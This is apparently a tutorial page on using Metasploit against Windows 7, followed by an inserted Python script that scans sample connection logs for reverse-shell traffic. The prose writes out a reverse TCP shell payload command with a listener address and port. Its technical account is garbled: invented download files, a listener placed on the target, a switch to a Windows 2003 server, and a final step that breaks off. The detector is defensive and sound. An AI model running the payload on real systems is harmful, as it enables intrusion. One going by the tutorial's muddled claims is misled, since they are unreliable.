Learn Penetration Testing with Metasploit on Windows 7 32-bit
The payload in this exploit is a reverse TCP shell for Windows. In our case, the shell runs Windows PowerShell inside an interactive shell. This means that a hacker can gain full access to an affected computer with no further interaction on their part. This exploit is quite capable, and can be used to compromise remote systems via RDP, which would be one of the most common entry points for an attacker. The exploit's main purpose is to allow a hacker to run commands on the affected computer, such as system-level configuration changes and access to data, based on their own input. After all of that, the exploit waits for the infected target to reboot its system, then goes silent until it receives a new command.
Metasploit for Windows 7 32-bit Download
The download portion of the exploit consists of two files: a metasploit.rb exploit and a setup.rb configuration file. The setup.rb file is a Ruby script that tells the exploit which of Metasploit's pre-written exploits to use to compromise the target. Once setup.rb has been run, the metasploit.rb file is run with just one line of input to its console.
To make a long story short, I simply used the Metasploit exploit after downloading it, by running the command msfpayload windows/shell_reverse_tcp lhost=192.168.137.13 lport=4444. If you have any questions about the technique, feel free to ask in the comments section below.
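From the defender's side, a reverse TCP shell means the target itself opens the connection, so outbound connection logs are where it shows up. The following is an added example, not code from the original page: it scans constructed log lines (the field names and the process legacy_svc.exe are assumptions, loosely modelled on Sysmon network-connection events) for shell processes dialing out and for any process connecting to the lport 4444 used above.

```python
import ipaddress
import re

# Constructed sample records, loosely modelled on Sysmon Event ID 3
# (network connection) fields. Not captured from a real host.
SAMPLE_EVENTS = r"""
ts=2024-01-10T09:14:02Z image=C:\Windows\System32\svchost.exe initiated=true dst_ip=192.168.137.1 dst_port=53
ts=2024-01-10T09:15:40Z image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe initiated=true dst_ip=192.168.137.13 dst_port=4444
ts=2024-01-10T09:16:05Z image=C:\Windows\System32\cmd.exe initiated=true dst_ip=192.168.137.13 dst_port=443
ts=2024-01-10T09:17:31Z image=C:\Apps\legacy_svc.exe initiated=true dst_ip=192.168.137.13 dst_port=4444
ts=2024-01-10T09:18:12Z image=C:\Windows\System32\cmd.exe initiated=false dst_ip=192.168.137.20 dst_port=4444
malformed line without fields
"""

SHELLS = {"cmd.exe", "powershell.exe"}
HANDLER_PORT = 4444  # the lport value from the command on this page

def parse_event(line):
    """Return a dict of typed fields, or None if the line is unusable."""
    fields = dict(re.findall(r"(\w+)=(\S+)", line))
    if not {"image", "initiated", "dst_ip", "dst_port"}.issubset(fields):
        return None
    try:
        fields["dst_ip"] = str(ipaddress.ip_address(fields["dst_ip"]))
        fields["dst_port"] = int(fields["dst_port"])
    except ValueError:
        return None
    return fields

def find_reverse_shell_leads(log_text):
    """Flag outbound connections that match reverse-shell behaviour."""
    leads = []
    for line in log_text.splitlines():
        ev = parse_event(line)
        # A reverse shell dials out, so only host-initiated connections count.
        if ev is None or ev["initiated"] != "true":
            continue
        proc = ev["image"].rsplit("\\", 1)[-1].lower()
        is_shell = proc in SHELLS
        # The port is attacker-chosen, so a port match alone is a weak signal.
        on_handler_port = ev["dst_port"] == HANDLER_PORT
        if is_shell or on_handler_port:
            severity = "high" if is_shell and on_handler_port else "medium"
            leads.append((severity, proc, ev["dst_ip"], ev["dst_port"]))
    return leads

if __name__ == "__main__":
    for lead in find_reverse_shell_leads(SAMPLE_EVENTS):
        print(*lead)
```

A "medium" result is a lead for triage rather than a verdict, since administrators also run PowerShell commands that make outbound connections.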
For the next steps, we'll need to first establish a listener on the target Windows 2003 server. You can do this by using msfconsole on the target server and typing the following (default is to use the standard Administrator account):